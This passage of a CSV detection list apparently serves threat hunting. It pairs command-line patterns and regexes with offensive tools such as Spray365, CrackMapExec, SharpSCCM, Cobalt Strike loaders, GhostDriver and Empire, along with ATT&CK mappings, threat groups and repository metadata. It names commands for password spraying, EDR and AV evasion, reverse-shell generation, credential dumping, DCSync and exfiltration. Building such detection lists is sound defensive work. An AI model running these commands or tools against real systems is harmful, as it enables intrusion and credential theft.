"* generate normal -ep ex-plan.s365 *",".{0,1000}\sgenerate\snormal\s\-ep\sex\-plan\.s365\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* -generate -server * -setcradle bh.py*",".{0,1000}\s\-generate\s\-server\s.{0,1000}\s\-setcradle\sbh\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* -generate -setcradle pythonmemorymodule.py*",".{0,1000}\s\-generate\s\-setcradle\spythonmemorymodule\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "* generate_bind_fuegoshell.ps1*",".{0,1000}\sgenerate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "* generate_my_dll*",".{0,1000}\sgenerate_my_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "* generate_reverse_fuegoshell.ps1*",".{0,1000}\sgenerate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "* generatePayload*",".{0,1000}\sgeneratePayload.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --gen-relay-list *",".{0,1000}\s\-\-gen\-relay\-list\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* --gen-relay-list /tmp/relaylistOutputFilename.txt*",".{0,1000}\s\-\-gen\-relay\-list\s\/tmp\/relaylistOutputFilename\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* get class-instances SMS_R_System *",".{0,1000}\sget\sclass\-instances\sSMS_R_System\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* get class-properties SMS_Admin*",".{0,1000}\sget\sclass\-properties\sSMS_Admin.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* get collection-members -n USERS*",".{0,1000}\sget\scollection\-members\s\-n\sUSERS.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* get primary-users -u *",".{0,1000}\sget\sprimary\-users\s\-u\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* get site-push-settings*",".{0,1000}\sget\ssite\-push\-settings.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "*-------------- Get System Priv with WebClient --------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sGet\sSystem\sPriv\swith\sWebClient\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "* get_keystrokes*",".{0,1000}\sget_keystrokes.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* get_netdomaincontroller*",".{0,1000}\sget_netdomaincontroller.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* get_netrdpsession*",".{0,1000}\sget_netrdpsession.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* get_rooot *",".{0,1000}\sget_rooot\s.{0,1000}","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","0","N/A","N/A","3","203","44","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "* get_timedscreenshot*",".{0,1000}\sget_timedscreenshot.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' *",".{0,1000}\sGet\-ADReplAccount\s\-SamAccountName\s\'AZUREADSSOACC\$\'\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "* GetAppLockerPolicies*",".{0,1000}\sGetAppLockerPolicies.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "* Get-GPPPassword.ps1*",".{0,1000}\sGet\-GPPPassword\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Get-InfectedThread.ps1*",".{0,1000}\sGet\-InfectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Get-InjectedThread.ps1*",".{0,1000}\sGet\-InjectedThread\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* GetLsassPid*",".{0,1000}\sGetLsassPid.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "* GetNPUsers.py*",".{0,1000}\sGetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Get-OSTokenInformation.ps1*",".{0,1000}\sGet\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* GetPasswords.ps1*",".{0,1000}\sGetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* getprivs.c *",".{0,1000}\sgetprivs\.c\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* getprivs.o *",".{0,1000}\sgetprivs\.o\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* Get-ScheduledTaskComHandler.ps1*",".{0,1000}\sGet\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Get-ServiceFromRegistry -Name Spooler*",".{0,1000}\sGet\-ServiceFromRegistry\s\-Name\sSpooler.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "* Get-SpoolStatus.ps1*",".{0,1000}\sGet\-SpoolStatus\.ps1.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "* --get-syscallstub *",".{0,1000}\s\-\-get\-syscallstub\s.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/icyguider/Nimcrypt2","1","0","N/A","N/A","8","707","118","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z" "* Get-TGSCipher.ps1*",".{0,1000}\sGet\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Ghauri is going to use the current database to enumerate table(s) entries*",".{0,1000}\sGhauri\sis\sgoing\sto\suse\sthe\scurrent\sdatabase\sto\senumerate\stable\(s\)\sentries.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "* GhostDriver.exe*",".{0,1000}\sGhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "* ghostdriver.sys*",".{0,1000}\sghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001 - T1211 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","0","N/A","9","3","240","34","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z" "* GhostTask.c *",".{0,1000}\sGhostTask\.c\s.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "* -GHUser * -GHRepo *",".{0,1000}\s\-GHUser\s.{0,1000}\s\-GHRepo\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-ExfilDataToGitHub.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* giop-info.nse*",".{0,1000}\sgiop\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* github repos list --org*",".{0,1000}\sgithub\srepos\slist\s\-\-org.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "* github repos list --user *",".{0,1000}\sgithub\srepos\slist\s\-\-user\s.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "* give-dcsync*",".{0,1000}\sgive\-dcsync.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* give-genericall * -target-sid 